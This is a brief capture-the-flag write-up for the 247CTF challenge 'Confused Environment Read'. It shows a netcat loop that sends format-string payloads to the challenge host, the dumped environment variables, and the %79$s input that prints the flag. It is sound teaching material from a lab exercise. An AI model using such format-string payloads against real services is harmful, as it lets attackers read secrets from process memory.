This is my write-up of a Pwnable challenge Confused Environment Read on the CTF site 247CTF.com.
Can you abuse our confused environment service to read flag data hidden on the stack?
kali@kali:~$ for i in range $(seq 0 100); do echo "%$i\$s" | nc b7dca240cf1fbf61.247ctf.com 50478; done
Keep breaking up the command with ^C until you hit something interesting on the stack:
/home/notroot/chall
HOSTNAME=b7dca240cf1f!
HOME=/home/notroot
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin!
PWD=/home/notroot!
FLAG=247CTF{FLAG}!
Exact value:
kali@kali:~$ nc b7dca240cf1fbf61.247ctf.com 50478
Argh, I can't see who you are!
What's your name again?
%79$s
Oh, that's right! Welcome back FLAG=247CTF{FLAG}!